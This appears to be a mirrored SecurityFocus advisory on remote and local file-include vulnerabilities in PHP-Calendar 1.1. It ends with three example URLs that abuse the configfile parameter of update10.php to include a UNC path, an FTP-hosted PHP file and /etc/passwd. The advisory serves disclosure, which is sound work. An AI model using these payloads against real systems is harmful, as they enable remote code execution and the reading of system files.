11 lines
No EOL
809 B
Text
11 lines
No EOL
809 B
Text
source: https://www.securityfocus.com/bid/37450/info
|
|
|
|
PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
|
|
|
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
|
|
http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
|
|
http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd |